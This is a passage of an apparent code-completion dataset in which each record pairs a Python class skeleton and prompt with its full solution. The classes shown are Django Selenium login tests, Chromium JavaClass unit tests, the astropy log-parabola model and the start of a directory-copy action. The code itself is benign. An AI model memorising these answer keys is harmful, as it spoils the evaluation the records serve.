那么,第一次得到的登录验证邮件中的链接无法完成登录 第二次得到的则可以\n\n<|skeleton|>\nclass LoginTest:\n \"\"\"登录测试\"\"\"\n\n def test_001(self):\n \"\"\"输入邮箱地址发送邮件,然后取得登录验证的链接并成功登录\"\"\"\n <|body_0|>\n\n def test_002(self):\n \"\"\"使用错误的链接无法完成登录,并得到登录失败的提示\"\"\"\n <|body_1|>\n\n def test_003(self):\n \"\"\"对同一邮箱地址发送了两次登录验证的邮件 那么,第一次得到的登录验证邮件中的链接无法完成登录 第二次得到的则可以\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.staging_tests:\n test_email = 'superlists_tests@163.com'\n else:\n test_email = 'abc@163.com'\n self.browser.get(self.live_server_url)\n input_email = self.browser.find_element_by_name('email')\n input_email.send_keys(test_email)\n input_email.send_keys(Keys.ENTER)\n self.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\n email_body = self.wait_for_email(test_email)\n url = self.get_token_url(email_body)\n self.assertIn(self.live_server_url, url)\n self.browser.get(url)\n self.wait_to_be_logged_in(email=test_email)\n self.browser.find_element_by_link_text('退出').click()\n self.wait_to_be_logged_out(email=test_email)\n<|end_body_0|>\n\n<|body_start_1|>\n discorrect_url = '{}/accounts/login?token=abc123'.format(self.live_server_url)\n self.browser.get(discorrect_url)\n self.wait_for(lambda: self.assertIn('登录失败', self.browser.find_element_by_id('id_messages').text))\n self.browser.find_element_by_name('email')\n<|end_body_1|>\n\n<|body_start_2|>\n if self.staging_tests:\n test_email = 'superlists_tests@163.com'\n else:\n test_email = 'abc@163.com'\n self.browser.get(self.live_server_url)\n input_email = self.browser.find_element_by_name('email')\n input_email.send_keys(test_email)\n input_email.send_keys(Keys.ENTER)\n self.wait_for(lambda: 
self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\n email_body = self.wait_for_email(test_email)\n url_1 = self.get_token_url(email_body)\n self.browser.quit()\n time.sleep(5)\n self.init_browser()\n self.browser.get(self.live_server_url)\n input_email = self.browser.find_element_by_name('email')\n input_email.send_keys(test_email)\n input_email.send_keys(Keys.ENTER)\n self.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\n email_body = self.wait_for_email(test_email)\n url_2 = self.get_token_url(email_body)\n self.assertNotEqual(url_1, url_2)\n self.browser.get(url_1)\n self.wait_for(lambda: self.assertIn('登录失败', self.browser.find_element_by_id('id_messages').text))\n self.browser.find_element_by_name('email')\n self.browser.get(url_2)\n self.wait_to_be_logged_in(email=test_email)\n<|end_body_2|>\n", "revision_id": "973b3afb239db5f55cb52897e7a8a241a459349f", "skeleton": "<|skeleton|>\nclass LoginTest:\n \"\"\"登录测试\"\"\"\n\n def test_001(self):\n \"\"\"输入邮箱地址发送邮件,然后取得登录验证的链接并成功登录\"\"\"\n <|body_0|>\n\n def test_002(self):\n \"\"\"使用错误的链接无法完成登录,并得到登录失败的提示\"\"\"\n <|body_1|>\n\n def test_003(self):\n \"\"\"对同一邮箱地址发送了两次登录验证的邮件 那么,第一次得到的登录验证邮件中的链接无法完成登录 第二次得到的则可以\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class LoginTest:\n \"\"\"登录测试\"\"\"\n\n def test_001(self):\n \"\"\"输入邮箱地址发送邮件,然后取得登录验证的链接并成功登录\"\"\"\n if self.staging_tests:\n test_email = 'superlists_tests@163.com'\n else:\n test_email = 'abc@163.com'\n self.browser.get(self.live_server_url)\n input_email = self.browser.find_element_by_name('email')\n input_email.send_keys(test_email)\n input_email.send_keys(Keys.ENTER)\n self.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\n email_body = self.wait_for_email(test_email)\n url = self.get_token_url(email_body)\n self.assertIn(self.live_server_url, url)\n self.browser.get(url)\n self.wait_to_be_logged_in(email=test_email)\n self.browser.find_element_by_link_text('退出').click()\n self.wait_to_be_logged_out(email=test_email)\n\n def test_002(self):\n \"\"\"使用错误的链接无法完成登录,并得到登录失败的提示\"\"\"\n discorrect_url = '{}/accounts/login?token=abc123'.format(self.live_server_url)\n self.browser.get(discorrect_url)\n self.wait_for(lambda: self.assertIn('登录失败', self.browser.find_element_by_id('id_messages').text))\n self.browser.find_element_by_name('email')\n\n def test_003(self):\n \"\"\"对同一邮箱地址发送了两次登录验证的邮件 那么,第一次得到的登录验证邮件中的链接无法完成登录 第二次得到的则可以\"\"\"\n if self.staging_tests:\n test_email = 'superlists_tests@163.com'\n else:\n test_email = 'abc@163.com'\n self.browser.get(self.live_server_url)\n input_email = self.browser.find_element_by_name('email')\n input_email.send_keys(test_email)\n input_email.send_keys(Keys.ENTER)\n self.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\n email_body = self.wait_for_email(test_email)\n url_1 = self.get_token_url(email_body)\n self.browser.quit()\n time.sleep(5)\n self.init_browser()\n self.browser.get(self.live_server_url)\n input_email = self.browser.find_element_by_name('email')\n input_email.send_keys(test_email)\n input_email.send_keys(Keys.ENTER)\n self.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\n email_body = self.wait_for_email(test_email)\n url_2 = self.get_token_url(email_body)\n self.assertNotEqual(url_1, url_2)\n 
self.browser.get(url_1)\n self.wait_for(lambda: self.assertIn('登录失败', self.browser.find_element_by_id('id_messages').text))\n self.browser.find_element_by_name('email')\n self.browser.get(url_2)\n self.wait_to_be_logged_in(email=test_email)\n", "source": "the_stack_v2_python_sparse", "source_path": "functional_tests/test_accounts/test_login.py", "source_repo": "aaluo001/superlists", "split": "test", "star_events_count": 0} {"blob_id": "c532fbbfdde307a35d233e4084d03c5f605ea7d7", "bodies": ["test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\nself.assertEqual(test_node.name, f'{self.TEST_PKG}.{self.TEST_CLS}')\nself.assertEqual(test_node.package, self.TEST_PKG)\nself.assertEqual(test_node.class_name, self.TEST_CLS)", "test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\nequal_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\nself.assertEqual(test_node, equal_node)", "test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\ntest_node.add_nested_class(self.UNIQUE_KEY_1)\nself.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1})", "test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\ntest_node.add_nested_class(self.UNIQUE_KEY_1)\ntest_node.add_nested_class(self.UNIQUE_KEY_2)\nself.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1, self.UNIQUE_KEY_2})", "test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\ntest_node.add_nested_class(self.UNIQUE_KEY_1)\ntest_node.add_nested_class(self.UNIQUE_KEY_1)\nself.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1})"], "bodies_text": "<|body_start_0|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n self.assertEqual(test_node.name, f'{self.TEST_PKG}.{self.TEST_CLS}')\n self.assertEqual(test_node.package, self.TEST_PKG)\n self.assertEqual(test_node.class_name, self.TEST_CLS)\n<|end_body_0|>\n\n<|body_start_1|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n equal_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n self.assertEqual(test_node, equal_node)\n<|end_body_1|>\n\n<|body_start_2|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n self.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1})\n<|end_body_2|>\n\n<|body_start_3|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n test_node.add_nested_class(self.UNIQUE_KEY_2)\n self.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1, self.UNIQUE_KEY_2})\n<|end_body_3|>\n\n<|body_start_4|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n self.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1})\n<|end_body_4|>\n", "class_docstring": "Unit tests for dependency_analysis.class_dependency.JavaClass.", "class_name": "TestJavaClass", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TestJavaClass:\n \"\"\"Unit tests for dependency_analysis.class_dependency.JavaClass.\"\"\"\n\n def test_initialization(self):\n \"\"\"Tests that JavaClass is initialized correctly.\"\"\"\n <|body_0|>\n\n def test_equality(self):\n \"\"\"Tests that two JavaClasses with the same package+class are equal.\"\"\"\n <|body_1|>\n\n def test_add_nested_class(self):\n \"\"\"Tests adding a single nested class to this 
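A note on the LoginTest record that closes above: its bodies lean on helpers defined on the functional-test base class rather than in the record itself (wait_for, wait_for_email, get_token_url, init_browser), and the asserted UI strings are Chinese: '邮件发送成功' is "the email was sent successfully" and '登录失败' is "login failed". As a rough sketch only (the regex and the failure message are assumptions, not the aaluo001/superlists implementation), get_token_url typically reduces to pulling the first URL out of the email body:

    import re

    def get_token_url(self, email_body):
        # Hypothetical helper: grab the first http(s) URL in the email body.
        match = re.search(r'https?://[^\s]+', email_body)
        if match is None:
            self.fail('Could not find a login url in email body:\n' + email_body)
        return match.group(0)

test_003 quits and re-creates the browser between the two requests so the second attempt starts from a clean session; per its docstring, when two login emails go to the same address, only the link from the second email is expected to work.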
class.\"\"\"\n <|body_2|>\n\n def test_add_nested_class_multiple(self):\n \"\"\"Tests adding multiple nested classes to this class.\"\"\"\n <|body_3|>\n\n def test_add_nested_class_duplicate(self):\n \"\"\"Tests that adding the same nested class twice will not dupe.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n self.assertEqual(test_node.name, f'{self.TEST_PKG}.{self.TEST_CLS}')\n self.assertEqual(test_node.package, self.TEST_PKG)\n self.assertEqual(test_node.class_name, self.TEST_CLS)\n<|end_body_0|>\n\n<|body_start_1|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n equal_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n self.assertEqual(test_node, equal_node)\n<|end_body_1|>\n\n<|body_start_2|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n self.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1})\n<|end_body_2|>\n\n<|body_start_3|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n test_node.add_nested_class(self.UNIQUE_KEY_2)\n self.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1, self.UNIQUE_KEY_2})\n<|end_body_3|>\n\n<|body_start_4|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n self.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1})\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000276", "length_bytes": 4801, "license_type": "permissive", "methods": [{"docstring": "Tests that JavaClass is initialized correctly.", "name": "test_initialization", "signature": "def test_initialization(self)"}, {"docstring": "Tests that two JavaClasses with the same package+class are equal.", "name": "test_equality", "signature": "def test_equality(self)"}, {"docstring": "Tests adding a single nested class to this class.", "name": "test_add_nested_class", "signature": "def test_add_nested_class(self)"}, {"docstring": "Tests adding multiple nested classes to this class.", "name": "test_add_nested_class_multiple", "signature": "def test_add_nested_class_multiple(self)"}, {"docstring": "Tests that adding the same nested class twice will not dupe.", "name": "test_add_nested_class_duplicate", "signature": "def test_add_nested_class_duplicate(self)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_001298", "prompt": "Implement the Python class `TestJavaClass` described below.\n\nClass description:\nUnit tests for dependency_analysis.class_dependency.JavaClass.\n\nMethod signatures and docstrings:\n- def test_initialization(self): Tests that JavaClass is initialized correctly.\n- def test_equality(self): Tests that two JavaClasses with the same package+class are equal.\n- def test_add_nested_class(self): Tests adding a single nested class to this class.\n- def test_add_nested_class_multiple(self): Tests adding multiple nested classes to this class.\n- def test_add_nested_class_duplicate(self): Tests that adding the same nested class twice will not dupe.", "prompted_full_text": "Implement the Python class `TestJavaClass` described below.\n\nClass description:\nUnit tests for dependency_analysis.class_dependency.JavaClass.\n\nMethod signatures and docstrings:\n- def test_initialization(self): Tests that JavaClass is initialized correctly.\n- def test_equality(self): 
Tests that two JavaClasses with the same package+class are equal.\n- def test_add_nested_class(self): Tests adding a single nested class to this class.\n- def test_add_nested_class_multiple(self): Tests adding multiple nested classes to this class.\n- def test_add_nested_class_duplicate(self): Tests that adding the same nested class twice will not dupe.\n\n<|skeleton|>\nclass TestJavaClass:\n \"\"\"Unit tests for dependency_analysis.class_dependency.JavaClass.\"\"\"\n\n def test_initialization(self):\n \"\"\"Tests that JavaClass is initialized correctly.\"\"\"\n <|body_0|>\n\n def test_equality(self):\n \"\"\"Tests that two JavaClasses with the same package+class are equal.\"\"\"\n <|body_1|>\n\n def test_add_nested_class(self):\n \"\"\"Tests adding a single nested class to this class.\"\"\"\n <|body_2|>\n\n def test_add_nested_class_multiple(self):\n \"\"\"Tests adding multiple nested classes to this class.\"\"\"\n <|body_3|>\n\n def test_add_nested_class_duplicate(self):\n \"\"\"Tests that adding the same nested class twice will not dupe.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n self.assertEqual(test_node.name, f'{self.TEST_PKG}.{self.TEST_CLS}')\n self.assertEqual(test_node.package, self.TEST_PKG)\n self.assertEqual(test_node.class_name, self.TEST_CLS)\n<|end_body_0|>\n\n<|body_start_1|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n equal_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n self.assertEqual(test_node, equal_node)\n<|end_body_1|>\n\n<|body_start_2|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n self.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1})\n<|end_body_2|>\n\n<|body_start_3|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n test_node.add_nested_class(self.UNIQUE_KEY_2)\n self.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1, self.UNIQUE_KEY_2})\n<|end_body_3|>\n\n<|body_start_4|>\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n self.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1})\n<|end_body_4|>\n", "revision_id": "a401d6cf4f7bf0e2d2e964c512ebb923c3d8832c", "skeleton": "<|skeleton|>\nclass TestJavaClass:\n \"\"\"Unit tests for dependency_analysis.class_dependency.JavaClass.\"\"\"\n\n def test_initialization(self):\n \"\"\"Tests that JavaClass is initialized correctly.\"\"\"\n <|body_0|>\n\n def test_equality(self):\n \"\"\"Tests that two JavaClasses with the same package+class are equal.\"\"\"\n <|body_1|>\n\n def test_add_nested_class(self):\n \"\"\"Tests adding a single nested class to this class.\"\"\"\n <|body_2|>\n\n def test_add_nested_class_multiple(self):\n \"\"\"Tests adding multiple nested classes to this class.\"\"\"\n <|body_3|>\n\n def test_add_nested_class_duplicate(self):\n \"\"\"Tests that adding the same nested class twice will not dupe.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TestJavaClass:\n \"\"\"Unit tests for dependency_analysis.class_dependency.JavaClass.\"\"\"\n\n def test_initialization(self):\n \"\"\"Tests that JavaClass is initialized correctly.\"\"\"\n test_node = 
class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n self.assertEqual(test_node.name, f'{self.TEST_PKG}.{self.TEST_CLS}')\n self.assertEqual(test_node.package, self.TEST_PKG)\n self.assertEqual(test_node.class_name, self.TEST_CLS)\n\n def test_equality(self):\n \"\"\"Tests that two JavaClasses with the same package+class are equal.\"\"\"\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n equal_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n self.assertEqual(test_node, equal_node)\n\n def test_add_nested_class(self):\n \"\"\"Tests adding a single nested class to this class.\"\"\"\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n self.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1})\n\n def test_add_nested_class_multiple(self):\n \"\"\"Tests adding multiple nested classes to this class.\"\"\"\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n test_node.add_nested_class(self.UNIQUE_KEY_2)\n self.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1, self.UNIQUE_KEY_2})\n\n def test_add_nested_class_duplicate(self):\n \"\"\"Tests that adding the same nested class twice will not dupe.\"\"\"\n test_node = class_dependency.JavaClass(self.TEST_PKG, self.TEST_CLS)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n test_node.add_nested_class(self.UNIQUE_KEY_1)\n self.assertEqual(test_node.nested_classes, {self.UNIQUE_KEY_1})\n", "source": "the_stack_v2_python_sparse", "source_path": "tools/android/dependency_analysis/class_dependency_unittest.py", "source_repo": "chromium/chromium", "split": "test", "star_events_count": 17408} {"blob_id": "6a8cd2950f6b94c5d9344334fede04012c162db9", "bodies": ["xx = x / x_0\nexponent = -alpha - beta * np.log(xx)\nreturn amplitude * xx ** exponent", "xx = x / x_0\nlog_xx = np.log(xx)\nexponent = -alpha - beta * log_xx\nd_amplitude = xx ** exponent\nd_beta = -amplitude * d_amplitude * log_xx ** 2\nd_x_0 = amplitude * d_amplitude * (beta * log_xx / x_0 - exponent / x_0)\nd_alpha = -amplitude * d_amplitude * log_xx\nreturn [d_amplitude, d_x_0, d_alpha, d_beta]"], "bodies_text": "<|body_start_0|>\n xx = x / x_0\n exponent = -alpha - beta * np.log(xx)\n return amplitude * xx ** exponent\n<|end_body_0|>\n\n<|body_start_1|>\n xx = x / x_0\n log_xx = np.log(xx)\n exponent = -alpha - beta * log_xx\n d_amplitude = xx ** exponent\n d_beta = -amplitude * d_amplitude * log_xx ** 2\n d_x_0 = amplitude * d_amplitude * (beta * log_xx / x_0 - exponent / x_0)\n d_alpha = -amplitude * d_amplitude * log_xx\n return [d_amplitude, d_x_0, d_alpha, d_beta]\n<|end_body_1|>\n", "class_docstring": "One dimensional log parabola model (sometimes called curved power law). Parameters ---------- amplitude : float Model amplitude x_0 : float Reference point alpha : float Power law index beta : float Power law curvature See Also -------- PowerLaw1D, BrokenPowerLaw1D, ExponentialCutoffPowerLaw1D Notes ----- Model formula (with :math:`A` for ``amplitude`` and :math:`\\\\alpha` for ``alpha`` and :math:`\\\\beta` for ``beta``): .. 
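The TestJavaClass record above targets Chromium's dependency_analysis.class_dependency.JavaClass. A minimal object satisfying all five assertions looks roughly like the sketch below; it is inferred from the tests alone, not taken from the Chromium source, which also tracks inter-class dependency edges:

    class JavaClass:
        def __init__(self, package, class_name):
            self.package = package
            self.class_name = class_name
            self.name = f'{package}.{class_name}'  # fully-qualified name
            self.nested_classes = set()            # set semantics de-dupe keys

        def __eq__(self, other):
            # Nodes with the same package + class name compare equal.
            return self.name == other.name

        def add_nested_class(self, unique_key):
            self.nested_classes.add(unique_key)

The duplicate-add test passes for free because nested_classes is a set.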
math:: f(x) = A \\\\left(\\\\frac{x}{x_{0}}\\\\right)^{- \\\\alpha - \\\\beta \\\\log{\\\\left (\\\\frac{x}{x_{0}} \\\\right )}}", "class_name": "LogParabola1D", "detected_licenses": ["Python-2.0", "Apache-2.0", "BSD-3-Clause", "LicenseRef-scancode-unknown"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass LogParabola1D:\n \"\"\"One dimensional log parabola model (sometimes called curved power law). Parameters ---------- amplitude : float Model amplitude x_0 : float Reference point alpha : float Power law index beta : float Power law curvature See Also -------- PowerLaw1D, BrokenPowerLaw1D, ExponentialCutoffPowerLaw1D Notes ----- Model formula (with :math:`A` for ``amplitude`` and :math:`\\\\alpha` for ``alpha`` and :math:`\\\\beta` for ``beta``): .. math:: f(x) = A \\\\left(\\\\frac{x}{x_{0}}\\\\right)^{- \\\\alpha - \\\\beta \\\\log{\\\\left (\\\\frac{x}{x_{0}} \\\\right )}}\"\"\"\n\n def evaluate(x, amplitude, x_0, alpha, beta):\n \"\"\"One dimensional log parabola model function\"\"\"\n <|body_0|>\n\n def fit_deriv(x, amplitude, x_0, alpha, beta):\n \"\"\"One dimensional log parabola derivative with respect to parameters\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n xx = x / x_0\n exponent = -alpha - beta * np.log(xx)\n return amplitude * xx ** exponent\n<|end_body_0|>\n\n<|body_start_1|>\n xx = x / x_0\n log_xx = np.log(xx)\n exponent = -alpha - beta * log_xx\n d_amplitude = xx ** exponent\n d_beta = -amplitude * d_amplitude * log_xx ** 2\n d_x_0 = amplitude * d_amplitude * (beta * log_xx / x_0 - exponent / x_0)\n d_alpha = -amplitude * d_amplitude * log_xx\n return [d_amplitude, d_x_0, d_alpha, d_beta]\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000277", "length_bytes": 6539, "license_type": "permissive", "methods": [{"docstring": "One dimensional log parabola model function", "name": "evaluate", "signature": "def evaluate(x, amplitude, x_0, alpha, beta)"}, {"docstring": "One dimensional log parabola derivative with respect to parameters", "name": "fit_deriv", "signature": "def fit_deriv(x, amplitude, x_0, alpha, beta)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_000086", "prompt": "Implement the Python class `LogParabola1D` described below.\n\nClass description:\nOne dimensional log parabola model (sometimes called curved power law). Parameters ---------- amplitude : float Model amplitude x_0 : float Reference point alpha : float Power law index beta : float Power law curvature See Also -------- PowerLaw1D, BrokenPowerLaw1D, ExponentialCutoffPowerLaw1D Notes ----- Model formula (with :math:`A` for ``amplitude`` and :math:`\\\\alpha` for ``alpha`` and :math:`\\\\beta` for ``beta``): .. math:: f(x) = A \\\\left(\\\\frac{x}{x_{0}}\\\\right)^{- \\\\alpha - \\\\beta \\\\log{\\\\left (\\\\frac{x}{x_{0}} \\\\right )}}\n\nMethod signatures and docstrings:\n- def evaluate(x, amplitude, x_0, alpha, beta): One dimensional log parabola model function\n- def fit_deriv(x, amplitude, x_0, alpha, beta): One dimensional log parabola derivative with respect to parameters", "prompted_full_text": "Implement the Python class `LogParabola1D` described below.\n\nClass description:\nOne dimensional log parabola model (sometimes called curved power law). 
Parameters ---------- amplitude : float Model amplitude x_0 : float Reference point alpha : float Power law index beta : float Power law curvature See Also -------- PowerLaw1D, BrokenPowerLaw1D, ExponentialCutoffPowerLaw1D Notes ----- Model formula (with :math:`A` for ``amplitude`` and :math:`\\\\alpha` for ``alpha`` and :math:`\\\\beta` for ``beta``): .. math:: f(x) = A \\\\left(\\\\frac{x}{x_{0}}\\\\right)^{- \\\\alpha - \\\\beta \\\\log{\\\\left (\\\\frac{x}{x_{0}} \\\\right )}}\n\nMethod signatures and docstrings:\n- def evaluate(x, amplitude, x_0, alpha, beta): One dimensional log parabola model function\n- def fit_deriv(x, amplitude, x_0, alpha, beta): One dimensional log parabola derivative with respect to parameters\n\n<|skeleton|>\nclass LogParabola1D:\n \"\"\"One dimensional log parabola model (sometimes called curved power law). Parameters ---------- amplitude : float Model amplitude x_0 : float Reference point alpha : float Power law index beta : float Power law curvature See Also -------- PowerLaw1D, BrokenPowerLaw1D, ExponentialCutoffPowerLaw1D Notes ----- Model formula (with :math:`A` for ``amplitude`` and :math:`\\\\alpha` for ``alpha`` and :math:`\\\\beta` for ``beta``): .. math:: f(x) = A \\\\left(\\\\frac{x}{x_{0}}\\\\right)^{- \\\\alpha - \\\\beta \\\\log{\\\\left (\\\\frac{x}{x_{0}} \\\\right )}}\"\"\"\n\n def evaluate(x, amplitude, x_0, alpha, beta):\n \"\"\"One dimensional log parabola model function\"\"\"\n <|body_0|>\n\n def fit_deriv(x, amplitude, x_0, alpha, beta):\n \"\"\"One dimensional log parabola derivative with respect to parameters\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n xx = x / x_0\n exponent = -alpha - beta * np.log(xx)\n return amplitude * xx ** exponent\n<|end_body_0|>\n\n<|body_start_1|>\n xx = x / x_0\n log_xx = np.log(xx)\n exponent = -alpha - beta * log_xx\n d_amplitude = xx ** exponent\n d_beta = -amplitude * d_amplitude * log_xx ** 2\n d_x_0 = amplitude * d_amplitude * (beta * log_xx / x_0 - exponent / x_0)\n d_alpha = -amplitude * d_amplitude * log_xx\n return [d_amplitude, d_x_0, d_alpha, d_beta]\n<|end_body_1|>\n", "revision_id": "2c9002f16bb5c265e0d14f4a2314c86eeaa35cb6", "skeleton": "<|skeleton|>\nclass LogParabola1D:\n \"\"\"One dimensional log parabola model (sometimes called curved power law). Parameters ---------- amplitude : float Model amplitude x_0 : float Reference point alpha : float Power law index beta : float Power law curvature See Also -------- PowerLaw1D, BrokenPowerLaw1D, ExponentialCutoffPowerLaw1D Notes ----- Model formula (with :math:`A` for ``amplitude`` and :math:`\\\\alpha` for ``alpha`` and :math:`\\\\beta` for ``beta``): .. math:: f(x) = A \\\\left(\\\\frac{x}{x_{0}}\\\\right)^{- \\\\alpha - \\\\beta \\\\log{\\\\left (\\\\frac{x}{x_{0}} \\\\right )}}\"\"\"\n\n def evaluate(x, amplitude, x_0, alpha, beta):\n \"\"\"One dimensional log parabola model function\"\"\"\n <|body_0|>\n\n def fit_deriv(x, amplitude, x_0, alpha, beta):\n \"\"\"One dimensional log parabola derivative with respect to parameters\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class LogParabola1D:\n \"\"\"One dimensional log parabola model (sometimes called curved power law). 
Parameters ---------- amplitude : float Model amplitude x_0 : float Reference point alpha : float Power law index beta : float Power law curvature See Also -------- PowerLaw1D, BrokenPowerLaw1D, ExponentialCutoffPowerLaw1D Notes ----- Model formula (with :math:`A` for ``amplitude`` and :math:`\\\\alpha` for ``alpha`` and :math:`\\\\beta` for ``beta``): .. math:: f(x) = A \\\\left(\\\\frac{x}{x_{0}}\\\\right)^{- \\\\alpha - \\\\beta \\\\log{\\\\left (\\\\frac{x}{x_{0}} \\\\right )}}\"\"\"\n\n def evaluate(x, amplitude, x_0, alpha, beta):\n \"\"\"One dimensional log parabola model function\"\"\"\n xx = x / x_0\n exponent = -alpha - beta * np.log(xx)\n return amplitude * xx ** exponent\n\n def fit_deriv(x, amplitude, x_0, alpha, beta):\n \"\"\"One dimensional log parabola derivative with respect to parameters\"\"\"\n xx = x / x_0\n log_xx = np.log(xx)\n exponent = -alpha - beta * log_xx\n d_amplitude = xx ** exponent\n d_beta = -amplitude * d_amplitude * log_xx ** 2\n d_x_0 = amplitude * d_amplitude * (beta * log_xx / x_0 - exponent / x_0)\n d_alpha = -amplitude * d_amplitude * log_xx\n return [d_amplitude, d_x_0, d_alpha, d_beta]\n", "source": "the_stack_v2_python_sparse", "source_path": "lib/python2.7/site-packages/astropy/modeling/powerlaws.py", "source_repo": "wangyum/Anaconda", "split": "test", "star_events_count": 11} {"blob_id": "fc099052310bca63f0cb51323d091e23546c163f", "bodies": ["ExecutionContext().transition(ExecutionContext.phases.VERIFICATION)\nlogstr = 'DirCopy: Checking source is readable + traversable, ' + '{0}'.format(self.dst)\nlogger.info('{0}: {1}'.format(self.file_context, logstr))\nif not filesys.access(self.src, access_codes.R_OK | access_codes.X_OK):\n return self.verification_codes.UNREADABLE_SOURCE\nlogger.info('{0}: DirCopy: Checking target is writeable, \"{1}\"'.format(self.file_context, self.dst))\nif not filesys.access(paths.dirname(self.dst), access_codes.W_OK):\n return self.verification_codes.UNWRITABLE_TARGET\nreturn self.verification_codes.OK", "vcode = self.verify_can_exec(filesys)\nif vcode == self.verification_codes.UNREADABLE_SOURCE:\n logstr = 'DirCopy: Non-Readable source directory \"%s\"' % self.src\n logger.warn('{0}: {1}'.format(self.file_context, logstr))\n return\nif vcode == self.verification_codes.UNWRITABLE_TARGET:\n logstr = 'DirCopy: Non-Writable target directory \"%s\"' % self.dst\n logger.warn('{0}: {1}'.format(self.file_context, logstr))\n return\nExecutionContext().transition(ExecutionContext.phases.EXECUTION)\nlogstr = 'Performing Directory Copy \"%s\" -> \"%s\"' % (self.src, self.dst)\nlogger.info('{0}: {1}'.format(self.file_context, logstr))\nfilesys.copy(self.src, self.dst)"], "bodies_text": "<|body_start_0|>\n 